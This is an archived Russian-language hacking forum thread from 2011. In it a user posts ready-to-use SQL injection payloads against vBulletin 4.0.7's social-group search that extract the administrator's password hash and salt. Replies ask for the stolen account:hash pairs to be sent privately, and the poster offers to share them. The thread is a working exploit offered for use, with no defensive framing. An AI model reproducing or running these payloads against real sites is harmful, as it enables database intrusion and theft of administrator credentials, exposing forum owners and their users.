PDA

Просмотр полной версии : [Уязвимость] Сливаем пароль админа с форумов на vBulluten v 4.0.7


Joker
15.12.2011, 13:29
Собственно в теме особо расписывать ничего не буду(всё понятно на видео)... Скажу лишь одно: взлом происходит через соц. группы с выуживанием хэша и соли...
Видео. ([Ссылки могут видеть только зарегистрированные и активированные пользователи] 5)
Коды:
Для выуживания хэша:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do =p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Для выуживания соли:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do =p rocess&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
P.S. Если помог - не забываем благодарить, мне будет приятно...
P.S.S. Если тема нарушает правила - прошу удалить, но не банить т.к. такого п.п. не нашёл.

qpatypuk
15.12.2011, 13:34
Сольше в виде акк:хэш кидай в ЛС.

Joker
15.12.2011, 13:36
qpatypuk, у меня имеется соль и хэш, тебе это надо, а то я первое слово не понял?)

Andry lomakin
19.12.2011, 23:44
4.0.7 это старая на ней не будет форумов тока на 4.1.8